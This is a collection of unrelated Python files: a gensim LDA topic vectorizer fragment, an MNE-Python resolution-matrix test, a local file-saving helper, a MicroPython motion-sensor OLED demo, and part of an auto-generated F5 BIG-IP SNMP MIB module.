        self.corpus = [id2word.doc2bow(d) for d in docs]
        self.lda = LdaMulticore(corpus=self.corpus, id2word=id2word,
                                **self.lda_params)
        return self

    def transform(self, docs):
        """
        :param docs: List of split strings.
        :return: numpy.ndarray
        """
        cur_bow = [self.lda.id2word.doc2bow(d) for d in docs]
        lda_bag_of_topics = [self.lda[c] for c in cur_bow]
        num_terms = self.lda.num_topics
        if self.is_dense:
            return corpus2dense(lda_bag_of_topics, num_terms).T
        return corpus2csc(lda_bag_of_topics, num_terms).T

    def fit_transform(self, docs, y=None, **fit_params):
        return self.fit(docs).transform(docs)

    def evaluate_coherence(self, docs, coherence="c_v"):
        """
        :param docs: List[List[str]]
        :param coherence: one of the coherence methods stated in
        gensim.models.CoherenceModel
        :return: gensim.models.CoherenceModel
        """
        # Fall back to CoherenceModel's default (-1, i.e. all cores) when the
        # caller did not pass workers explicitly.
        return CoherenceModel(model=self.lda, texts=docs, corpus=self.corpus,
                              coherence=coherence,
                              processes=self.lda_params.get("workers", -1))

    def save(self, fname, *args, **kwargs):
        self.lda.save(fname=fname, *args, **kwargs)

    @classmethod
    def load(cls, fname, return_dense=True, max_df=0.5, min_df=5, *args,
             **kwargs):
        lda = LdaMulticore.load(fname, *args, **kwargs)
        # Rebuild the vectorizer around the loaded model: mirror its training
        # parameters, then attach the trained model itself.
        vectorizer = cls(lda.num_topics, return_dense, max_df, min_df,
                         alpha=lda.alpha, eta=lda.eta,
                         iterations=lda.iterations,
                         random_state=lda.random_state,
                         workers=lda.workers)
        vectorizer.lda = lda
        return vectorizer
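# ---------------------------------------------------------------------------
# Hedged usage sketch on a toy corpus. `workers=1` is passed explicitly since
# evaluate_coherence() reads it from lda_params; all other settings are
# arbitrary examples, not recommendations.
if __name__ == "__main__":
    docs = [
        "the cat sat on the mat".split(),
        "dogs and cats are pets".split(),
        "the stock market fell today".split(),
        "investors sold shares in the market".split(),
    ] * 10  # repeat so min_df=2 keeps some terms

    vectorizer = GensimLDAVectorizer(num_topics=2, min_df=2, max_df=0.9,
                                     workers=1, passes=5)
    topic_matrix = vectorizer.fit_transform(docs)
    print(topic_matrix.shape)                            # (n_docs, num_topics)
    print(vectorizer.evaluate_coherence(docs).get_coherence())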
nilq/baby-python
python
# -*- coding: utf-8 -*- # Author: Olaf Hauk <olaf.hauk@mrc-cbu.cam.ac.uk> # Alexandre Gramfort <alexandre.gramfort@inria.fr> # Eric Larson <larson.eric.d@gmail.com> # # License: BSD (3-clause) import os.path as op import numpy as np from numpy.testing import (assert_equal, assert_array_almost_equal, assert_array_equal) import mne from mne.datasets import testing from mne.minimum_norm.resolution_matrix import (make_inverse_resolution_matrix, get_cross_talk, get_point_spread) data_path = testing.data_path(download=False) subjects_dir = op.join(data_path, 'subjects') fname_inv = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-eeg-oct-6-meg-inv.fif') fname_evoked = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-ave.fif') fname_raw = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_raw.fif') fname_t1 = op.join(data_path, 'subjects', 'sample', 'mri', 'T1.mgz') fname_src = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-eeg-oct-6-fwd.fif') fname_src_fs = op.join(data_path, 'subjects', 'fsaverage', 'bem', 'fsaverage-ico-5-src.fif') fname_src_3 = op.join(data_path, 'subjects', 'sample', 'bem', 'sample-oct-4-src.fif') fname_stc = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg') fname_vol = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-grad-vol-7-fwd-sensmap-vol.w') fname_vsrc = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-vol-7-fwd.fif') fname_inv_vol = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-vol-7-meg-inv.fif') rng = np.random.RandomState(0) fname_fwd = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-eeg-oct-4-fwd.fif') fname_cov = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-cov.fif') @testing.requires_testing_data def test_resolution_matrix(): """Test make_inverse_resolution_matrix() function.""" # read forward solution forward = mne.read_forward_solution(fname_fwd) # forward operator with fixed source orientations forward_fxd = mne.convert_forward_solution(forward, surf_ori=True, force_fixed=True) # noise covariance matrix noise_cov = mne.read_cov(fname_cov) # evoked data for info evoked = mne.read_evokeds(fname_evoked, 0) # make inverse operator from forward solution # free source orientation inverse_operator = mne.minimum_norm.make_inverse_operator( info=evoked.info, forward=forward, noise_cov=noise_cov, loose=1., depth=None) # fixed source orientation inverse_operator_fxd = mne.minimum_norm.make_inverse_operator( info=evoked.info, forward=forward, noise_cov=noise_cov, loose=0., depth=None, fixed=True) # regularisation parameter based on SNR snr = 3.0 lambda2 = 1.0 / snr ** 2 # resolution matrices for free source orientation # compute resolution matrix for MNE with free source orientations rm_mne_free = make_inverse_resolution_matrix(forward, inverse_operator, method='MNE', lambda2=lambda2) # compute resolution matrix for MNE, fwd fixed and inv free rm_mne_fxdfree = make_inverse_resolution_matrix(forward_fxd, inverse_operator, method='MNE', lambda2=lambda2) # resolution matrices for fixed source orientation # compute resolution matrix for MNE rm_mne = make_inverse_resolution_matrix(forward_fxd, inverse_operator_fxd, method='MNE', lambda2=lambda2) # compute resolution matrix for sLORETA rm_lor = make_inverse_resolution_matrix(forward_fxd, inverse_operator_fxd, method='sLORETA', lambda2=lambda2) # rectify resolution matrix for sLORETA before determining maxima rm_lor_abs = np.abs(rm_lor) # get maxima per column maxidxs = rm_lor_abs.argmax(axis=0) # create array with 
the expected stepwise increase in maximum indices goodidxs = np.arange(0, len(maxidxs), 1) # Tests # Does sLORETA have zero dipole localization error for columns/PSFs? assert_array_equal(maxidxs, goodidxs) # MNE resolution matrices symmetric? assert_array_almost_equal(rm_mne, rm_mne.T) assert_array_almost_equal(rm_mne_free, rm_mne_free.T) # Test conversion to STC idx = [1, 100, 400] stc_psf = get_point_spread(rm_mne, forward_fxd['src'], idx, norm=True) stc_ctf = get_cross_talk(rm_mne, forward_fxd['src'], idx, norm=True) assert_array_almost_equal(stc_psf.data, stc_ctf.data) # Test application of free inv to fixed fwd assert_equal(rm_mne_fxdfree.shape, (3 * rm_mne.shape[0], rm_mne.shape[0]))
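# A conceptual numpy-only sketch (not MNE code) of what the test above
# exercises: the resolution matrix is the inverse operator applied to the
# forward leadfield; its columns are point-spread functions (PSFs) and its
# rows are cross-talk functions (CTFs). All shapes here are made up.
import numpy as np

n_chan, n_src = 60, 200
G = np.random.randn(n_chan, n_src)   # toy forward leadfield
K = np.linalg.pinv(G)                # a crude stand-in for an inverse operator
R = K @ G                            # resolution matrix, (n_src, n_src)
psf = R[:, 5]                        # PSF of source 5 (column)
ctf = R[5, :]                        # CTF of source 5 (row)
print(R.shape, psf.shape, ctf.shape)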
nilq/baby-python
python
"""Module for local file system saving.""" import os import shutil from save_base import BaseSaver import util class FileSaver(BaseSaver): """A class for operations on files, handling the interaction with the local filesystem.""" def __init__(self, base_path): super().__init__(base_path) def exists(self, relative_path): """Check whether a file or a folder already exists at the given relative path.""" path = self.base_path + util.rpath(relative_path) return os.path.exists(path) def create_folder(self, relative_path): """Creating a folder at the given relative path.""" if not self.exists(relative_path): path = self.base_path + util.rpath(relative_path) os.makedirs(path) def save_file(self, relative_path, content, overwrite=False): """Save the file locally.""" path = self.base_path + util.rpath(relative_path) # move file instead of overwriting it if self.exists(relative_path) and not overwrite: to = self.base_path + util.rpath(BaseSaver.OVERW_FOLDER + relative_path) shutil.move(path, to) # save file with open(path, 'wb') as file: try: file.write(content) return True except IOError: return False
nilq/baby-python
python
'''
Experiment: Human presence (PIR) sensor
Version: v1.0
Date: 2021.1
Author: 01Studio
Community: www.01studio.org
'''

import time
from machine import SoftI2C, Pin  # import the SoftI2C and Pin classes from the machine module
from ssd1306 import SSD1306_I2C  # import the SSD1306_I2C driver from the ssd1306 module

# Initialise the OLED
i2c = SoftI2C(scl=Pin(10), sda=Pin(11))  # SoftI2C init: scl --> 10, sda --> 11
oled = SSD1306_I2C(128, 64, i2c, addr=0x3c)  # OLED init: 128x64 resolution, I2C address 0x3c

# Configure the PIR sensor input
human = Pin(27, Pin.IN, Pin.PULL_UP)

# Initial OLED message
oled.fill(0)  # clear the screen to black
oled.text("01Studio", 0, 0)  # write line 1
oled.text("Human body test:", 0, 15)  # write line 2
oled.show()  # refresh the OLED


def Display(human):

    # Flash "Get People!!!" five times
    for i in range(5):

        oled.fill(0)  # clear the screen to black
        oled.text("01Studio", 0, 0)  # write line 1
        oled.text("Human body test:", 0, 15)  # write line 2
        oled.text("Get People!!!", 0, 40)  # write line 3
        oled.show()  # refresh the OLED
        time.sleep_ms(500)

        oled.fill(0)  # clear the screen to black
        oled.text("01Studio", 0, 0)  # write line 1
        oled.text("Human body test:", 0, 15)  # write line 2
        oled.text("                 ", 0, 40)  # blank line 3
        oled.show()  # refresh the OLED
        time.sleep_ms(500)


human.irq(Display, Pin.IRQ_RISING)  # set up the interrupt, triggered on a rising edge
nilq/baby-python
python
# # PySNMP MIB module F5-BIGIP-COMMON-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/F5-BIGIP-COMMON-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 18:57:38 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint") ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup") NotificationType, Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, Counter32, ObjectIdentity, Unsigned32, TimeTicks, IpAddress, MibIdentifier, Integer32, iso, ModuleIdentity, Counter64, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "Counter32", "ObjectIdentity", "Unsigned32", "TimeTicks", "IpAddress", "MibIdentifier", "Integer32", "iso", "ModuleIdentity", "Counter64", "Gauge32") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") f5 = ModuleIdentity((1, 3, 6, 1, 4, 1, 3375)) if mibBuilder.loadTexts: f5.setLastUpdated('201603022024Z') if mibBuilder.loadTexts: f5.setOrganization('F5 Networks, Inc.') bigipTrafficMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2)) bigipNotification = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 4)) bigipCompliance = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5)) bigipNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0)) bigipNotifyObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1)) bigipCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5, 1)) bigipGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2)) bigipNotificationGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4)) bigipNotifyObjMsg = MibScalar((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1, 1), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: bigipNotifyObjMsg.setStatus('current') bigipNotifyObjNode = MibScalar((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: bigipNotifyObjNode.setStatus('current') bigipNotifyObjPort = MibScalar((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1, 3), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: bigipNotifyObjPort.setStatus('current') bigipAgentStart = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 1)) if mibBuilder.loadTexts: bigipAgentStart.setStatus('current') bigipAgentShutdown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 2)) if mibBuilder.loadTexts: bigipAgentShutdown.setStatus('current') bigipAgentRestart = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 3)) if mibBuilder.loadTexts: bigipAgentRestart.setStatus('current') bigipCpuTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 4)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCpuTempHigh.setStatus('current') bigipCpuFanSpeedLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 5)).setObjects(("F5-BIGIP-COMMON-MIB", 
"bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCpuFanSpeedLow.setStatus('current') bigipCpuFanSpeedBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 6)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCpuFanSpeedBad.setStatus('current') bigipChassisTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 7)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChassisTempHigh.setStatus('current') bigipChassisFanBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 8)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChassisFanBad.setStatus('current') bigipChassisPowerSupplyBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 9)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChassisPowerSupplyBad.setStatus('current') bigipServiceDown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 10)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjPort")) if mibBuilder.loadTexts: bigipServiceDown.setStatus('current') bigipServiceUp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 11)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjPort")) if mibBuilder.loadTexts: bigipServiceUp.setStatus('current') bigipNodeDown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 12)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode")) if mibBuilder.loadTexts: bigipNodeDown.setStatus('current') bigipNodeUp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 13)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode")) if mibBuilder.loadTexts: bigipNodeUp.setStatus('current') bigipStandby = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 14)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipStandby.setStatus('current') bigipActive = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 15)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipActive.setStatus('current') bigipActiveActive = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 16)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipActiveActive.setStatus('current') bigipFeatureFailed = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 17)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFeatureFailed.setStatus('current') bigipFeatureOnline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 18)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFeatureOnline.setStatus('current') bigipLicenseFailed = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 19)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLicenseFailed.setStatus('current') bigipLicenseExpired = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 20)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLicenseExpired.setStatus('current') bigipTamdAlert = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 21)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTamdAlert.setStatus('current') bigipAggrReaperStateChange = NotificationType((1, 3, 
6, 1, 4, 1, 3375, 2, 4, 0, 22)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAggrReaperStateChange.setStatus('current') bigipARPConflict = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 23)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipARPConflict.setStatus('current') bigipNetLinkDown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 24)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipNetLinkDown.setStatus('current') bigipDiskPartitionWarn = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 25)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDiskPartitionWarn.setStatus('current') bigipDiskPartitionGrowth = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 26)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDiskPartitionGrowth.setStatus('current') bigipAuthFailed = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 27)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAuthFailed.setStatus('current') bigipConfigLoaded = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 28)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipConfigLoaded.setStatus('deprecated') bigipLogEmerg = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 29)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogEmerg.setStatus('current') bigipLogAlert = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 30)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogAlert.setStatus('current') bigipLogCrit = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 31)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogCrit.setStatus('current') bigipLogErr = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 32)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogErr.setStatus('current') bigipLogWarning = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 33)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogWarning.setStatus('current') bigipPacketRejected = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 34)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPacketRejected.setStatus('current') bigipCompLimitExceeded = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 35)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCompLimitExceeded.setStatus('current') bigipSslLimitExceeded = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 36)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSslLimitExceeded.setStatus('current') bigipExternalLinkChange = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 37)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipExternalLinkChange.setStatus('current') bigipAsmRequestBlocked = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 38)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmRequestBlocked.setStatus('current') bigipAsmRequestViolation = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 39)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmRequestViolation.setStatus('current') 
bigipGtmPoolAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 40)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolAvail.setStatus('current') bigipGtmPoolNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 41)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolNotAvail.setStatus('current') bigipGtmPoolDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 42)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolDisabled.setStatus('current') bigipGtmPoolEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 43)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolEnabled.setStatus('current') bigipGtmLinkAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 44)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkAvail.setStatus('current') bigipGtmLinkNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 45)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkNotAvail.setStatus('current') bigipGtmLinkDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 46)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkDisabled.setStatus('current') bigipGtmLinkEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 47)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkEnabled.setStatus('current') bigipGtmWideIpAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 48)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpAvail.setStatus('current') bigipGtmWideIpNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 49)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpNotAvail.setStatus('current') bigipGtmWideIpDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 50)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpDisabled.setStatus('current') bigipGtmWideIpEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 51)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpEnabled.setStatus('current') bigipGtmPoolMbrAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 52)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrAvail.setStatus('current') bigipGtmPoolMbrNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 53)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrNotAvail.setStatus('current') bigipGtmPoolMbrDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 54)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrDisabled.setStatus('current') bigipGtmPoolMbrEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 55)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrEnabled.setStatus('current') bigipGtmServerAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 56)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerAvail.setStatus('current') bigipGtmServerNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 
57)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerNotAvail.setStatus('current') bigipGtmServerDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 58)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerDisabled.setStatus('current') bigipGtmServerEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 59)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerEnabled.setStatus('current') bigipGtmVsAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 60)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsAvail.setStatus('current') bigipGtmVsNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 61)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsNotAvail.setStatus('current') bigipGtmVsDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 62)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsDisabled.setStatus('current') bigipGtmVsEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 63)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsEnabled.setStatus('current') bigipGtmDcAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 64)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcAvail.setStatus('current') bigipGtmDcNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 65)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcNotAvail.setStatus('current') bigipGtmDcDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 66)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcDisabled.setStatus('current') bigipGtmDcEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 67)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcEnabled.setStatus('current') bigipHardDiskFailure = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 68)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipHardDiskFailure.setStatus('deprecated') bigipGtmAppObjAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 69)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppObjAvail.setStatus('current') bigipGtmAppObjNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 70)).setObjects(("F5-BIGIP-COMMON-MIB", 